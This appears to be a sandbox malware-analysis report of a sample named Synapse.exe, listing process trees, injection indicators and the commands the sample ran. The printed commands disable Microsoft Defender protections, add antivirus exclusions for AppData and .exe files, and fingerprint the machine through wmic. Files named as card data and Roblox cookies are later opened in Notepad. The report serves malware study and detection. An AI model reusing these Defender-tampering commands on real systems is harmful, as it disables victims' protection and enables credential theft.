4800	msedge.exe
4800	msedge.exe
4800	msedge.exe
4800	msedge.exe
4800	msedge.exe
4800	msedge.exe
4800	msedge.exe
4800	msedge.exe
4800	msedge.exe
4800	msedge.exe
4800	msedge.exe
4800	msedge.exe
4800	msedge.exe
4800	msedge.exe
4800	msedge.exe
4008	chrome.exe
4532	msedge.exe
4532	msedge.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4008	chrome.exe
4800	msedge.exe
4800	msedge.exe
4800	msedge.exe
4800	msedge.exe
4800	msedge.exe
4800	msedge.exe
4800	msedge.exe
4800	msedge.exe
4800	msedge.exe
4800	msedge.exe
4800	msedge.exe
4800	msedge.exe
4800	msedge.exe
4800	msedge.exe
4800	msedge.exe
4800	msedge.exe
4800	msedge.exe
4800	msedge.exe
4800	msedge.exe
4800	msedge.exe
4800	msedge.exe
4800	msedge.exe
4800	msedge.exe
4800	msedge.exe
4532	msedge.exe
4532	msedge.exe
4532	msedge.exe
4532	msedge.exe
4532	msedge.exe
4532	msedge.exe
4532	msedge.exe
4532	msedge.exe
4532	msedge.exe
4532	msedge.exe
4532	msedge.exe
4532	msedge.exe
4532	msedge.exe
4532	msedge.exe
4532	msedge.exe
4532	msedge.exe

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
5724	Fiddler.exe
5724	Fiddler.exe
4220	Fiddler.exe
4220	Fiddler.exe
5352	Fiddler.exe
5352	Fiddler.exe
4128	Fiddler.exe
4128	Fiddler.exe
4528	Fiddler.exe
4528	Fiddler.exe
5616	Fiddler.exe
5616	Fiddler.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2036 wrote to memory of 2308	2036	Synapse.exe	82
PID 2036 wrote to memory of 2308	2036	Synapse.exe	82
PID 2308 wrote to memory of 3532	2308	Synapse.exe	101
PID 2308 wrote to memory of 3532	2308	Synapse.exe	101
PID 3532 wrote to memory of 3308	3532	cmd.exe	103
PID 3532 wrote to memory of 3308	3532	cmd.exe	103
PID 2308 wrote to memory of 4128	2308	Synapse.exe	104
PID 2308 wrote to memory of 4128	2308	Synapse.exe	104
PID 4128 wrote to memory of 776	4128	cmd.exe	106
PID 4128 wrote to memory of 776	4128	cmd.exe	106
PID 4128 wrote to memory of 1644	4128	cmd.exe	108
PID 4128 wrote to memory of 1644	4128	cmd.exe	108
PID 4128 wrote to memory of 5056	4128	cmd.exe	109
PID 4128 wrote to memory of 5056	4128	cmd.exe	109
PID 4128 wrote to memory of 976	4128	cmd.exe	110
PID 4128 wrote to memory of 976	4128	cmd.exe	110
PID 4848 wrote to memory of 5020	4848	Synapse.exe	115
PID 4848 wrote to memory of 5020	4848	Synapse.exe	115
PID 5020 wrote to memory of 2712	5020	Synapse.exe	116
PID 5020 wrote to memory of 2712	5020	Synapse.exe	116
PID 2712 wrote to memory of 3860	2712	cmd.exe	118
PID 2712 wrote to memory of 3860	2712	cmd.exe	118
PID 5020 wrote to memory of 3676	5020	Synapse.exe	119
PID 5020 wrote to memory of 3676	5020	Synapse.exe	119
PID 3676 wrote to memory of 1212	3676	cmd.exe	121
PID 3676 wrote to memory of 1212	3676	cmd.exe	121
PID 3676 wrote to memory of 3496	3676	cmd.exe	122
PID 3676 wrote to memory of 3496	3676	cmd.exe	122
PID 3676 wrote to memory of 3124	3676	cmd.exe	123
PID 3676 wrote to memory of 3124	3676	cmd.exe	123
PID 3676 wrote to memory of 452	3676	cmd.exe	124
PID 3676 wrote to memory of 452	3676	cmd.exe	124
PID 4008 wrote to memory of 4088	4008	chrome.exe	137
PID 4008 wrote to memory of 4088	4008	chrome.exe	137
PID 4008 wrote to memory of 2460	4008	chrome.exe	138
PID 4008 wrote to memory of 2460	4008	chrome.exe	138
PID 4008 wrote to memory of 2460	4008	chrome.exe	138
PID 4008 wrote to memory of 2460	4008	chrome.exe	138
PID 4008 wrote to memory of 2460	4008	chrome.exe	138
PID 4008 wrote to memory of 2460	4008	chrome.exe	138
PID 4008 wrote to memory of 2460	4008	chrome.exe	138
PID 4008 wrote to memory of 2460	4008	chrome.exe	138
PID 4008 wrote to memory of 2460	4008	chrome.exe	138
PID 4008 wrote to memory of 2460	4008	chrome.exe	138
PID 4008 wrote to memory of 2460	4008	chrome.exe	138
PID 4008 wrote to memory of 2460	4008	chrome.exe	138
PID 4008 wrote to memory of 2460	4008	chrome.exe	138
PID 4008 wrote to memory of 2460	4008	chrome.exe	138
PID 4008 wrote to memory of 2460	4008	chrome.exe	138
PID 4008 wrote to memory of 2460	4008	chrome.exe	138
PID 4008 wrote to memory of 2460	4008	chrome.exe	138
PID 4008 wrote to memory of 2460	4008	chrome.exe	138
PID 4008 wrote to memory of 2460	4008	chrome.exe	138
PID 4008 wrote to memory of 2460	4008	chrome.exe	138
PID 4008 wrote to memory of 2460	4008	chrome.exe	138
PID 4008 wrote to memory of 2460	4008	chrome.exe	138
PID 4008 wrote to memory of 2460	4008	chrome.exe	138
PID 4008 wrote to memory of 2460	4008	chrome.exe	138
PID 4008 wrote to memory of 2460	4008	chrome.exe	138
PID 4008 wrote to memory of 2460	4008	chrome.exe	138
PID 4008 wrote to memory of 2460	4008	chrome.exe	138
PID 4008 wrote to memory of 2460	4008	chrome.exe	138
PID 4008 wrote to memory of 2460	4008	chrome.exe	138
PID 4008 wrote to memory of 2460	4008	chrome.exe	138

C:\Users\Admin\AppData\Local\Temp\Synapse.exe
"C:\Users\Admin\AppData\Local\Temp\Synapse.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2036
- C:\Users\Admin\AppData\Local\Temp\Synapse.exe
  "C:\Users\Admin\AppData\Local\Temp\Synapse.exe"
  2⤵
  - Drops startup file
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3532
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4128
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:776
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1644
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5056
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:4812
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:1784
- - C:\Windows\System32\Wbem\wmic.exe
    wmic cpu get Name
    3⤵
    PID:4020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:4336
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1448
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:4056
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:5008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid"
    3⤵
    PID:1988
  - - C:\Windows\System32\wbem\WMIC.exe
      C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid
      4⤵
      PID:1480

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5032

C:\Users\Admin\Desktop\Synapse.exe
"C:\Users\Admin\Desktop\Synapse.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4848
- C:\Users\Admin\Desktop\Synapse.exe
  "C:\Users\Admin\Desktop\Synapse.exe"
  2⤵
  - Drops startup file
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2712
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3676
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1212
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3496
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3124
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:2792
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:3744
- - C:\Windows\System32\Wbem\wmic.exe
    wmic cpu get Name
    3⤵
    PID:1784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:2556
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:3572
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:2432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid"
    3⤵
    PID:1448
  - - C:\Windows\System32\wbem\WMIC.exe
      C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid
      4⤵
      PID:3616

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\op0HIx95km\Browser\cc's.txt
1⤵
PID:4092

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\op0HIx95km\Browser\roblox cookies.txt
1⤵
PID:3196

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4008
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x120,0x124,0x128,0x100,0x12c,0x7ffc3fefab58,0x7ffc3fefab68,0x7ffc3fefab78
  2⤵
  PID:4088
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1716 --field-trial-handle=1668,i,13101113582917801851,12812619444801719532,131072 /prefetch:2
  2⤵
  PID:2460
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1668,i,13101113582917801851,12812619444801719532,131072 /prefetch:8
  2⤵
  PID:1564
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2192 --field-trial-handle=1668,i,13101113582917801851,12812619444801719532,131072 /prefetch:8
  2⤵
  PID:5076
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3076 --field-trial-handle=1668,i,13101113582917801851,12812619444801719532,131072 /prefetch:1
  2⤵
  PID:3280
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3084 --field-trial-handle=1668,i,13101113582917801851,12812619444801719532,131072 /prefetch:1
  2⤵
  PID:452
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4360 --field-trial-handle=1668,i,13101113582917801851,12812619444801719532,131072 /prefetch:1
  2⤵
  PID:1008
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4488 --field-trial-handle=1668,i,13101113582917801851,12812619444801719532,131072 /prefetch:8
  2⤵
  PID:4380
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4664 --field-trial-handle=1668,i,13101113582917801851,12812619444801719532,131072 /prefetch:8
  2⤵
  PID:3532
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4652 --field-trial-handle=1668,i,13101113582917801851,12812619444801719532,131072 /prefetch:1
  2⤵
  PID:4624
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3272 --field-trial-handle=1668,i,13101113582917801851,12812619444801719532,131072 /prefetch:8
  2⤵
  PID:3804
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3312 --field-trial-handle=1668,i,13101113582917801851,12812619444801719532,131072 /prefetch:8
  2⤵
  PID:1480
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4920 --field-trial-handle=1668,i,13101113582917801851,12812619444801719532,131072 /prefetch:8
  2⤵
  PID:2712
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4388 --field-trial-handle=1668,i,13101113582917801851,12812619444801719532,131072 /prefetch:1
  2⤵
  PID:3940
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=3244 --field-trial-handle=1668,i,13101113582917801851,12812619444801719532,131072 /prefetch:1
  2⤵
  PID:2368
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5312 --field-trial-handle=1668,i,13101113582917801851,12812619444801719532,131072 /prefetch:8
  2⤵
  PID:1112
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=5408 --field-trial-handle=1668,i,13101113582917801851,12812619444801719532,131072 /prefetch:1
  2⤵
  PID:2664
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5216 --field-trial-handle=1668,i,13101113582917801851,12812619444801719532,131072 /prefetch:8
  2⤵
  PID:804
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5344 --field-trial-handle=1668,i,13101113582917801851,12812619444801719532,131072 /prefetch:8
  2⤵
  PID:624
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5652 --field-trial-handle=1668,i,13101113582917801851,12812619444801719532,131072 /prefetch:8
  2⤵
  PID:3580
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4228 --field-trial-handle=1668,i,13101113582917801851,12812619444801719532,131072 /prefetch:8
  2⤵
  PID:3132
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5804 --field-trial-handle=1668,i,13101113582917801851,12812619444801719532,131072 /prefetch:8
  2⤵
  PID:1740
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5784 --field-trial-handle=1668,i,13101113582917801851,12812619444801719532,131072 /prefetch:8
  2⤵
  PID:1432
- C:\Users\Admin\Downloads\FiddlerSetup.5.0.20242.10753-latest.exe
  "C:\Users\Admin\Downloads\FiddlerSetup.5.0.20242.10753-latest.exe"
  2⤵
  - Executes dropped EXE
  PID:2372
- - C:\Users\Admin\AppData\Local\Temp\nsdB04C.tmp\FiddlerSetup.exe
    "C:\Users\Admin\AppData\Local\Temp\nsdB04C.tmp\FiddlerSetup.exe" /D=
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Modifies Internet Explorer settings
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    PID:1960
  - - C:\Windows\SysWOW64\netsh.exe
      "C:\Windows\system32\netsh.exe" advfirewall firewall delete rule name="FiddlerProxy"
      4⤵
      Modifies Windows Firewall
      PID:324
  - - C:\Windows\SysWOW64\netsh.exe
      "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name="FiddlerProxy" program="C:\Users\Admin\AppData\Local\Programs\Fiddler\Fiddler.exe" action=allow profile=any dir=in edge=deferuser protocol=tcp description="Permit inbound connections to Fiddler"
      4⤵
      Modifies Windows Firewall
      PID:5036
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" install "C:\Users\Admin\AppData\Local\Programs\Fiddler\Fiddler.exe"
      4⤵
      PID:3416
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1e8 -InterruptEvent 0 -NGENProcess 1d8 -Pipe 1e4 -Comment "NGen Worker Process"
        5⤵
        
        PID:876
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 288 -InterruptEvent 0 -NGENProcess 294 -Pipe 280 -Comment "NGen Worker Process"
        5⤵
        
        PID:1776
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1d8 -InterruptEvent 0 -NGENProcess 1e0 -Pipe 1e8 -Comment "NGen Worker Process"
        5⤵
        Drops file in Windows directory
        
        PID:2796
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2d8 -InterruptEvent 0 -NGENProcess 290 -Pipe 294 -Comment "NGen Worker Process"
        5⤵
        Drops file in Windows directory
        
        PID:5716
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1d8 -InterruptEvent 0 -NGENProcess 2c0 -Pipe 1f8 -Comment "NGen Worker Process"
        5⤵
        Drops file in Windows directory
        
        PID:5664
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2d0 -InterruptEvent 0 -NGENProcess 2c4 -Pipe 2e8 -Comment "NGen Worker Process"
        5⤵
        Drops file in Windows directory
        
        PID:5844
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2e0 -InterruptEvent 0 -NGENProcess 2f4 -Pipe 2f8 -Comment "NGen Worker Process"
        5⤵
        
        PID:6020
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 310 -InterruptEvent 0 -NGENProcess 2e4 -Pipe 2f4 -Comment "NGen Worker Process"
        5⤵
        Drops file in Windows directory
        
        PID:6036
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2c4 -InterruptEvent 0 -NGENProcess 2e4 -Pipe 2bc -Comment "NGen Worker Process"
        5⤵
        Drops file in Windows directory
        
        PID:4248
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 310 -InterruptEvent 0 -NGENProcess 2e4 -Pipe 314 -Comment "NGen Worker Process"
        5⤵
        Drops file in Windows directory
        
        PID:5792
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2c4 -InterruptEvent 0 -NGENProcess 1e0 -Pipe 2e0 -Comment "NGen Worker Process"
        5⤵
        Drops file in Windows directory
        
        PID:5732
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 288 -InterruptEvent 0 -NGENProcess 1d8 -Pipe 308 -Comment "NGen Worker Process"
        5⤵
        Drops file in Windows directory
        
        PID:5040
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 290 -InterruptEvent 0 -NGENProcess 31c -Pipe 1d8 -Comment "NGen Worker Process"
        5⤵
        Drops file in Windows directory
        
        PID:4652
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 304 -InterruptEvent 0 -NGENProcess 300 -Pipe 288 -Comment "NGen Worker Process"
        5⤵
        Drops file in Windows directory
        
        PID:6104
